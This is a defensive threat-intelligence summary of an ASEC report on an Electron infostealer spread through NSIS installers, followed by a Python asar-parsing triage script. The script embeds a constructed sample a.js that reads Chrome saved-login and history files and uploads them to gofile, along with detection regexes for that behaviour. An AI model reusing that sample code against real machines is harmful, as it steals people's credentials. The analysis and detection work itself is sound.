Keypoints
- ASEC discovered an Infostealer implemented as an Electron application and distributed via NSIS installers.
- The malware’s malicious logic resides in Node.js scripts packaged inside an .asar archive (in a standard Electron build, resources/app.asar beside the executable); the code is hidden from a casual look at the binary, making static detection harder, even though asar is an unencrypted, uncompressed container.
- Analysts can unpack the .asar archive (for example with the asar npm package: npx asar extract app.asar out_dir) to retrieve and inspect the embedded JavaScript code, notably a.js.
- One strain disguises itself as TeamViewer-related software and collects system information, browser history, and saved credentials.
- Collected data is uploaded to the gofile file-sharing service for exfiltration.
- Because the payload leverages legitimate Electron packaging, both users and defenses may fail to recognize the malware; use official vendor sites to obtain software.
MITRE Techniques
- [T1204] User Execution – The malware is distributed in installer format and requires the user to run it; ‘Generally, the NSI script directly executes the malware distributed in the NSIS installer format.’
- [T1059] Command and Scripting Interpreter – Malicious behavior is implemented in Node.js scripts inside the Electron app (a.js), enabling script-based actions on the host; ‘Because Electron interacts with the OS via node.js, the actual malicious behaviors are defined in the node.js script.’
- [T1027] Obfuscated Files or Information – Use of Electron/.asar packaging conceals the malicious code within an application bundle, making detection more difficult; ‘they are difficult to recognize as malware both for detection and for users.’
- [T1082] System Information Discovery – The malware collects system information prior to exfiltration; ‘The uploaded data includes system information…’
- [T1005] Data from Local System – The malware harvests local browser histories and saved IDs/passwords from the victim system for exfiltration; ‘The uploaded data includes… browser histories, and saved ID and password information.’
- [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Exfiltration is performed by uploading the harvested data to the gofile file-sharing service (T1537, Transfer Data to Cloud Account, covers cloud-to-cloud transfers within a provider and does not fit here); ‘uploads the collected user information on gofile, a file-sharing service.’
Indicators of Compromise
- [File hash] Samples (MD5) tied to installer filenames – 9926e2782d603061b52d88f83d93e7af (TeamViewer.exe), cfc6e0014b3cc8d4dcaf0d76e2382556 (BetterShaders Setup 1.0.3.exe), b150afa6b3642ea1da1233b76f7b454e (Software.exe)
- [File name] Malicious/disguised installers observed – TeamViewer.exe, BetterShaders Setup 1.0.3.exe
- [Service/Host] Exfiltration destination – gofile (file-sharing service used to receive uploaded data)
A malicious Electron installer places a packaged Electron app on the target with the usual project hierarchy; the executable bootstraps an .asar archive (resources/app.asar) containing the Node.js application code. Analysts can extract the package with the standard asar tooling (for example npx asar extract app.asar out_dir) to retrieve the embedded JavaScript files, most notably a.js, which hold the core malicious routines.
The Node.js script implements data collection routines that enumerate system information and harvest browser artifacts, including history and stored credentials. In the observed variants the collected artifacts are written to files and uploaded by an automated upload routine to an external file-sharing service (gofile), giving the operator off-host exfiltration without any infrastructure of their own. One observed lure impersonated TeamViewer-related software to raise the likelihood of user execution.
Because the payload is delivered inside an otherwise legitimate-looking Electron application and launched via an NSIS installer, it can evade casual inspection and some detection controls. The recommended analysis flow is to (1) capture and unpack the NSIS installer, (2) extract the .asar archive and also check any app.asar.unpacked directory beside it for files the packager left outside the archive, (3) inspect scripts such as a.js for collection and upload functions, and (4) follow the network routines to identify exfiltration endpoints. Prefer installers from official vendor websites to reduce exposure to such trojanized Electron apps.
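The unpack-and-inspect flow above, as an added example (not ASEC's tooling and not the malware's code): a small Python triage script that parses the asar container directly instead of shelling out to the asar CLI, lists every packaged file, marks entries the packager left in app.asar.unpacked, and scans the extracted scripts for the collection and upload primitives the report describes. The archive layout (a Chromium Pickle header carrying a JSON index, followed by the concatenated file bytes) is the electron/asar format; the sample a.js, the pattern list and the helper names are constructed for this example and are reading aids, not signatures from the report.

```python
import json
import re
import struct


def _pad4(n: int) -> int:
    return (4 - n % 4) % 4


def build_asar(files: dict) -> bytes:
    """Pack {path: bytes | None} into asar bytes (used here only to construct
    sample input). None marks an entry stored beside the archive in app.asar.unpacked."""
    header = {"files": {}}
    blob = bytearray()
    for path, content in files.items():
        node = header["files"]
        parts = path.split("/")
        for d in parts[:-1]:
            node = node.setdefault(d, {"files": {}})["files"]
        if content is None:
            node[parts[-1]] = {"size": 0, "unpacked": True}
        else:
            node[parts[-1]] = {"size": len(content), "offset": str(len(blob))}
            blob += content
    hdr = json.dumps(header).encode()
    # Pickle string payload: uint32 length, the bytes, zero padding to a 4-byte boundary.
    payload = struct.pack("<I", len(hdr)) + hdr + b"\0" * _pad4(len(hdr))
    header_pickle = struct.pack("<I", len(payload)) + payload
    size_pickle = struct.pack("<II", 4, len(header_pickle))  # [4][header_size]
    return size_pickle + header_pickle + bytes(blob)


def parse_asar(data: bytes) -> dict:
    """Return {path: bytes} for every packed file; unpacked entries map to None."""
    if len(data) < 16:
        raise ValueError("not an asar archive (too short)")
    magic, header_size = struct.unpack_from("<II", data, 0)
    if magic != 4 or header_size + 8 > len(data):
        raise ValueError("not an asar archive (bad pickle header)")
    _, json_len = struct.unpack_from("<II", data, 8)
    header = json.loads(data[16:16 + json_len])
    base = 8 + header_size  # "offset" values in the index are relative to here
    out = {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            path = prefix + name
            if "files" in meta:            # directory node
                walk(meta, path + "/")
            elif meta.get("unpacked"):     # lives in app.asar.unpacked, not in this blob
                out[path] = None
            else:
                start = base + int(meta["offset"])
                end = start + int(meta["size"])
                if end > len(data):
                    raise ValueError(f"{path}: entry runs past end of archive")
                out[path] = data[start:end]

    walk(header, "")
    return out


# Illustrative heuristics (assumed, not from the report): label -> regex.
PATTERNS = {
    "sysinfo": re.compile(r"\bos\.(hostname|platform|userInfo|cpus|networkInterfaces)\("),
    "browser-db": re.compile(r"Login Data|Web Data|History|Cookies"),
    "exfil-gofile": re.compile(r"gofile", re.I),
    "upload": re.compile(r"\bfetch\(|axios\.post|form-data|multipart"),
    "exec": re.compile(r"child_process|execSync|spawn\("),
}


def scan_scripts(files: dict) -> dict:
    """Return {path: [labels]} for each packed .js file that matches at least one pattern."""
    hits = {}
    for path, content in files.items():
        if content is None or not path.endswith(".js"):
            continue
        text = content.decode("utf-8", errors="replace")
        labels = sorted(k for k, rx in PATTERNS.items() if rx.search(text))
        if labels:
            hits[path] = labels
    return hits


def triage(archive: bytes) -> dict:
    return scan_scripts(parse_asar(archive))


# Constructed sample archive: a trimmed a.js with the primitives described, plus benign files.
SAMPLE_A_JS = b"""
const os = require('os'); const fs = require('fs'); const path = require('path');
const info = { host: os.hostname(), user: os.userInfo().username, plat: os.platform() };
const chrome = path.join(process.env.LOCALAPPDATA, 'Google/Chrome/User Data/Default');
const loot = [fs.readFileSync(path.join(chrome, 'Login Data')), fs.readFileSync(path.join(chrome, 'History'))];
fetch(uploadUrl('gofile'), { method: 'POST', body: toFormData(info, loot) });
"""
SAMPLE_ARCHIVE = build_asar({
    "package.json": b'{"name":"app","main":"main.js"}',
    "main.js": b"require('./a.js');",
    "a.js": SAMPLE_A_JS,
    "node_modules/native/bin.node": None,  # native addon left in app.asar.unpacked
})

if __name__ == "__main__":
    for script, labels in triage(SAMPLE_ARCHIVE).items():
        print(script, labels)
```

Against a real sample, call parse_asar on the bytes of resources/app.asar; the hit list tells you which scripts to read first, and a None entry tells you to go look in app.asar.unpacked, which extractors that only read the archive will miss. The regexes are a starting point for manual review, not a verdict: a benign updater will also hit "upload", and heavily minified or obfuscated scripts may hide the os.* calls behind property lookups.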
Read more: https://asec.ahnlab.com/en/64445/